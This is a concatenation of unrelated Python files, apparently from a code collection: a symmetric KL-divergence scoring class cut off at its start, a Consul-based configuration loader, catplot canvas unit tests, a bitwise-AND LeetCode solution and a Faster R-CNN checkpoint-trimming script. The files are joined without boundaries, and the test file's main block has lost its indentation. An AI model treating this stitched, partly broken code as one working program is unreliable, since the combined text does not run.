    Calculates the difference of two sampled distributions P and Q in form of
    an entropy measure. The D_KL measure is effectively the difference of the
    cross-entropy of both distributions P,Q and the entropy of P.
    D_KL can be interpreted as the amount of information lost when
    approximating P by Q.
    . math $$ D\mathrm{KL}(P||Q) =\sum{i} P(i) \log_2 \frac{P(i)}{Q(i)}
    = H(P,Q) - H(P) $$
    The returned score is the symmetric version of the kl divergence
    . math $$ D_\mathrm{KL}(P,Q) := \frac{1}{2} \left(D_\mathrm{KL}(P|Q) +
    D_\mathrm{KL}(Q|P)\right)$$
    Parameters
    ----------
    kl_binsize : float
        Bin size of the histogram, used to calculate the KL divergence.
    """
    score = np.nan

    @staticmethod
    def _binned_densities(data_sample_1, data_sample_2, kl_binsize):
        """Histogram both samples (NaN/inf filtered) on a shared bin grid.

        Returns (sample1, sample2, P, Q, edges).  This factors out the
        identical histogram code previously duplicated in compute() and
        plot().
        """
        # Filter out NaN/inf values.
        sample1 = np.array(data_sample_1)[np.isfinite(data_sample_1)]
        sample2 = np.array(data_sample_2)[np.isfinite(data_sample_2)]
        max_value = max(sample1.max(), sample2.max())
        min_value = min(sample1.min(), sample2.min())
        # np.linspace requires an integer number of points; the original
        # float value raises TypeError on modern NumPy (int() matches the
        # old implicit truncation).
        bins = int((max_value - min_value) / kl_binsize)
        edges = np.linspace(min_value, max_value, bins)
        P, edges = np.histogram(sample1, bins=edges, density=True)
        Q, _ = np.histogram(sample2, bins=edges, density=True)
        return sample1, sample2, P, Q, edges

    @classmethod
    def compute(cls, data_sample_1, data_sample_2, kl_binsize=0.005, **kwargs):
        """Compute the symmetric KL divergence between the two samples.

        Bins where either density is zero are discarded (D_KL is undefined
        for Q(i) == 0); the number of discarded bins is recorded on the
        returned score as ``discarded_values``.
        """
        sample1, sample2, P, Q, edges = cls._binned_densities(
            data_sample_1, data_sample_2, kl_binsize)
        init_len = len(P)
        # Keep only bins where both densities are non-zero (equivalent to
        # the original two-step Q!=0 then P!=0 filtering).
        nonzero = (P != 0.) & (Q != 0.)
        P_non0 = P[nonzero]
        Q_non0 = Q[nonzero]
        discard = init_len - len(P_non0)
        # Symmetrized divergence: mean of D_KL(P||Q) and D_KL(Q||P).
        D_KL_PQ = entropy(P_non0, Q_non0, base=2)
        D_KL_QP = entropy(Q_non0, P_non0, base=2)
        D_KL = .5 * (D_KL_PQ + D_KL_QP)
        cls.score = kl_divergence(D_KL)
        cls.score.data_size = [len(sample1), len(sample2)]
        cls.score.discarded_values = discard
        cls.score.bins = len(edges) - 1
        return cls.score

    @classmethod
    def plot(cls, data_sample_1, data_sample_2, ax=None, palette=None,
             var_name='Measured Parameter', kl_binsize=0.005,
             sample_names=('observation', 'prediction'), **kwargs):
        """Plot both densities and the per-bin KL contribution.

        ``sample_names`` default is a tuple (immutable) instead of the
        original mutable list default; it is only indexed, so callers are
        unaffected.
        """
        if ax is None:
            fig, ax = plt.subplots()
        ax.set_ylabel('Probability Density')
        ax.set_xlabel(var_name)
        if palette is None:
            palette = [sns.color_palette()[0], sns.color_palette()[1]]
        _, _, P, Q, edges = cls._binned_densities(
            data_sample_1, data_sample_2, kl_binsize)
        dx = np.diff(edges)[0]
        edges = edges[:-1]
        # Bin centers, padded by one empty bin on each side.
        xvalues = edges + dx / 2.
        xvalues = np.append(np.append(xvalues[0] - dx, xvalues), xvalues[-1] + dx)

        def secure_log(E, D):
            """Element-wise log(E/D), with 0 where either operand is 0."""
            log = np.zeros_like(E)
            mask = (E != 0) & (D != 0)
            log[mask] = np.log(E[mask] / D[mask])
            return log

        # Per-bin contribution to the symmetric divergence.
        diffy = .5 * (P - Q) * secure_log(P, Q.astype(float))
        P = np.append(np.append(0, P), 0)
        Q = np.append(np.append(0, Q), 0)
        filly = np.append(np.append(0., diffy), 0.)
        ax.fill_between(xvalues, filly, 0, color='0.8', label='d/dx DKL')
        ax.plot(xvalues, P, lw=2, color=palette[0], label=sample_names[0])
        ax.plot(xvalues, Q, lw=2, color=palette[1], label=sample_names[1])
        ax.set_xlim(xvalues[0], xvalues[-1])
        ax.set_yscale('log')
        plt.legend()
        return ax

    @property
    def sort_key(self):
        """Value used by sciunit to order scores."""
        return self.score

    def __str__(self):
        # Pretty terminal summary (underlined heading via ANSI escapes).
        return "\n\n\033[4mKullback-Leibler-Divergence\033[0m" \
            + "\n\tdatasize: {} \t {}" \
            .format(self.data_size[0], self.data_size[1]) \
            + "\n\tdiscarded: {}" \
            .format(self.discarded_values) \
            + "\n\tD_KL = {:.3f} \t bins = {}\n\n" \
            .format(self.score, self.bins)
import base64
import io
import requests
import yaml
from kikyo import Kikyo, Settings
def configure_by_consul(config_url: str, **kwargs) -> Kikyo:
    """Fetch a YAML-format configuration from Consul and build a Kikyo client.

    :param config_url: URL of the configuration endpoint.
    """
    resp = requests.get(config_url)
    resp.raise_for_status()
    settings = Settings()
    for entry in resp.json():
        raw = entry['Value']
        if not raw:
            continue
        # Consul returns base64-encoded values; decode then parse as YAML.
        decoded = base64.b64decode(raw)
        conf: dict = yaml.safe_load(io.BytesIO(decoded))
        # Only the first entry containing a 'kikyo' section is used.
        if 'kikyo' in conf:
            settings.merge(conf['kikyo'])
            break
    # Explicit keyword arguments override the fetched configuration.
    settings.merge(kwargs)
    return Kikyo(settings)
| 635 | 228 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Test case for Energy Profle Canvas.
"""
import unittest
import matplotlib.pyplot as plt
from catplot.ep_components.ep_canvas import EPCanvas
from catplot.ep_components.ep_lines import ElementaryLine
from catplot.ep_components.ep_chain import EPChain
class EPCanvasTest(unittest.TestCase):
    """Unit tests for catplot's energy-profile canvas (EPCanvas)."""

    def setUp(self):
        # NOTE(review): maxDiff is conventionally an int or None; True is
        # unusual here — confirm this is intended.
        self.maxDiff = True

    def test_construction_and_query(self):
        """ Test we can construct EPCanvas object correctly.
        """
        canvas = EPCanvas(margin_ratio=0.2)
        self.assertEqual(canvas.margin_ratio, 0.2)
        self.assertIsNone(canvas.figsize)
        self.assertIsNone(canvas.dpi)
        self.assertIsNone(canvas.facecolor)
        self.assertIsNone(canvas.edgecolor)
        self.assertListEqual(canvas.lines, [])
        self.assertListEqual(canvas.shadow_lines, [])
        self.assertTrue(canvas.figure)
        self.assertTrue(canvas.axes)
        # Check invalid margin ratio.
        self.assertRaises(ValueError, EPCanvas, margin_ratio=-0.1)
        plt.close(canvas.figure)

    def test_draw(self):
        """ Make sure the lines can be added without exceptions.
        """
        canvas = EPCanvas()
        line = ElementaryLine([0.0, 1.3, 0.8])
        canvas.add_lines([line])
        canvas.draw()
        plt.close(canvas.figure)

    def test_add_species_annotations(self):
        """ Make sure the species annotations can be added without exceptions.
        """
        canvas = EPCanvas()
        line = ElementaryLine([0.0, 1.3, 0.8],
                              rxn_equation="CO_b + O_b <-> CO-O_2b -> CO2_g + 2*_b")
        canvas.add_lines([line])
        canvas.add_species_annotations(line)
        plt.close(canvas.figure)

    def test_add_horizontal_auxiliary_line(self):
        """ Make sure the horizontal line can be added without exceptions.
        """
        canvas = EPCanvas()
        line = ElementaryLine([0.0, 1.3, 0.8])
        canvas.add_lines([line])
        canvas.add_horizontal_auxiliary_line(line)
        plt.close(canvas.figure)

    def test_add_vertical_auxiliary_line(self):
        """ Make sure the vertical line can be added without exceptions.
        """
        canvas = EPCanvas()
        line = ElementaryLine([0.0, 1.3, 0.8])
        canvas.add_lines([line])
        canvas.add_vertical_auxiliary_lines(line)
        plt.close(canvas.figure)

    def test_add_energy_annotations(self):
        """ Make sure the energy annotations can be added correctly.
        """
        canvas = EPCanvas()
        line = ElementaryLine([0.0, 1.3, 0.8])
        canvas.add_lines([line])
        canvas.add_energy_annotations(line)
        plt.close(canvas.figure)

    def test_add_chain(self):
        """ Test energy profile chain can be added correctly to canvas.
        """
        canvas = EPCanvas()
        self.assertFalse(canvas.lines)
        self.assertFalse(canvas.chains)
        l1 = ElementaryLine([0.0, 1.2, 0.6])
        l2 = ElementaryLine([0.0, 1.0, 0.8])
        chain = EPChain([l1, l2])
        canvas.add_chain(chain)
        self.assertEqual(len(canvas.lines), 2)
        for l in canvas.lines:
            self.assertTrue(isinstance(l, ElementaryLine))
        self.assertEqual(len(canvas.chains), 1)
        self.assertTrue(isinstance(canvas.chains[0], EPChain))
        # Exception is expected if add the chain again.
        self.assertRaises(ValueError, canvas.add_chain, chain)
        plt.close(canvas.figure)

    def test_contains(self):
        """ Test the `in` operator works for lines and chains on a canvas.
        """
        canvas = EPCanvas()
        l1 = ElementaryLine([0.0, 1.2, 0.6])
        l2 = ElementaryLine([0.0, 1.0, 0.8])
        chain = EPChain([l1])
        canvas.add_chain(chain)
        self.assertTrue(l1 in canvas)
        self.assertTrue(chain in canvas)
        self.assertFalse(l2 in canvas)
        plt.close(canvas.figure)

    def test_add_line(self):
        """ Test the line can be add to canvas correctly.
        """
        canvas = EPCanvas()
        l1 = ElementaryLine([0.0, 1.2, 0.6])
        canvas.add_line(l1)
        # Add repeat line, exception raises.
        self.assertRaises(ValueError, canvas.add_line, l1)
        plt.close(canvas.figure)

    def test_add_lines(self):
        """ Test multiple lines can be added, and duplicates rejected.
        """
        canvas = EPCanvas()
        l1 = ElementaryLine([0.0, 1.2, 0.6])
        l2 = ElementaryLine([0.0, 1.0, 0.8])
        canvas.add_lines([l1, l2])
        canvas.lines = []
        self.assertRaises(ValueError, canvas.add_lines, [l1, l1])
        plt.close(canvas.figure)

    def test_add_all_horizontal_auxiliary_lines(self):
        """ Make sure we can add all horizontal auxiliary lines to canvas.
        """
        canvas = EPCanvas()
        l1 = ElementaryLine([0.0, 1.2, 0.6])
        l2 = ElementaryLine([0.0, 1.0, 0.8])
        canvas.add_lines([l1, l2])
        canvas.add_all_horizontal_auxiliary_lines()
        plt.close(canvas.figure)
if "__main__" == __name__:
suite = unittest.TestLoader().loadTestsFromTestCase(EPCanvasTest)
unittest.TextTestRunner(verbosity=2).run(suite)
| 5,077 | 1,660 |
"""
# BITWISE AND OF NUMBERS RANGE
Given a range [m, n] where 0 <= m <= n <= 2147483647, return the bitwise AND of all numbers in this range, inclusive.
Example 1:
Input: [5,7]
Output: 4
Example 2:
Input: [0,1]
Output: 0
"""
class Solution:
    def rangeBitwiseAnd(self, m: int, n: int) -> int:
        """Return the bitwise AND of every integer in [m, n].

        The result is the common high-order binary prefix of m and n with
        zeros below it: shift both right until they agree, then shift the
        shared prefix back up.
        """
        shifts = 0
        while m < n:
            m >>= 1
            n >>= 1
            shifts += 1
        return m << shifts
# NOTE(review): presumably a mode flag selecting Reddit as the data source —
# confirm semantics at the call sites.
GET_FROM_REDDIT = 1
| 20 | 12 |
import torch
import numpy as np
# Adapt a COCO-pretrained Faster R-CNN checkpoint to a dataset with
# `num_classes` classes by truncating the box head's classification and
# regression layers, then save the adapted checkpoint.
num_classes = 25
model_coco = torch.load(r"/media/alvinai/Documents/model/faster_rcnn_r50_fpn_1x_20190610-bf0ea559.pth")
# Earlier experiments on resizing the RPN head, kept for reference:
# print(model_coco)
# print(model_coco["state_dict"]["rpn_head.rpn_cls.weight"].shape)
# a = model_coco["state_dict"]["rpn_head.rpn_cls.weight"][0]
# model_coco["state_dict"]["rpn_head.rpn_cls.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_cls.weight"], 0, values=a, axis=0)
# print(model_coco["state_dict"]["rpn_head.rpn_cls.weight"].shape)
# b=model_coco["state_dict"]["rpn_head.rpn_cls.bias"][0]
# model_coco["state_dict"]["rpn_head.rpn_cls.bias"] = np.insert(model_coco["state_dict"]["rpn_head.rpn_cls.bias"], 0, values=b, axis=0)
# print(model_coco["state_dict"]["rpn_head.rpn_cls.bias"].shape)
# c= model_coco["state_dict"]["rpn_head.rpn_reg.weight"][0].repeat(4,1,1,1)
# model_coco["state_dict"]["rpn_head.rpn_reg.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.weight"], 0, values=c, axis=0)
# # c= model_coco["state_dict"]["rpn_head.rpn_reg.weight"][1]
# # model_coco["state_dict"]["rpn_head.rpn_reg.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.weight"], 0, values=c, axis=0)
# # c= model_coco["state_dict"]["rpn_head.rpn_reg.weight"][2]
# # model_coco["state_dict"]["rpn_head.rpn_reg.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.weight"], 0, values=c, axis=0)
# # c= model_coco["state_dict"]["rpn_head.rpn_reg.weight"][3]
# # model_coco["state_dict"]["rpn_head.rpn_reg.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.weight"], 0, values=c, axis=0)
# print(model_coco["state_dict"]["rpn_head.rpn_reg.weight"].shape)
# d=model_coco["state_dict"]["rpn_head.rpn_reg.bias"][0].repeat(4,)
# model_coco["state_dict"]["rpn_head.rpn_reg.bias"] = np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.bias"], 0, values=d, axis=0)
# print(model_coco["state_dict"]["rpn_head.rpn_reg.bias"].shape)
# # model_coco["state_dict"]["rpn_head.rpn_reg.weight"] = model_coco["state_dict"]["rpn_head.rpn_reg.weight"].repeat(2,1,1,1)
# # model_coco["state_dict"]["rpn_head.rpn_reg.bias"] = model_coco["state_dict"]["rpn_head.rpn_reg.bias"].repeat(2,)
# weight
# Keep the first `num_classes` classification outputs and the first
# `num_classes * 4` regression outputs (4 box deltas per class).
model_coco["state_dict"]["bbox_head.fc_cls.weight"] = model_coco["state_dict"]["bbox_head.fc_cls.weight"][
    :num_classes, :]
model_coco["state_dict"]["bbox_head.fc_reg.weight"] = model_coco["state_dict"]["bbox_head.fc_reg.weight"][
    :num_classes*4, :]
# bias
model_coco["state_dict"]["bbox_head.fc_cls.bias"] = model_coco["state_dict"]["bbox_head.fc_cls.bias"][:num_classes]
model_coco["state_dict"]["bbox_head.fc_reg.bias"] = model_coco["state_dict"]["bbox_head.fc_reg.bias"][:num_classes*4]
# save new model
torch.save(model_coco, r"/media/alvinai/Documents/underwater/model/libra_faster_rcnn_r50_fpn_1x_cls_%d.pth" % num_classes)
| 2,955 | 1,317 |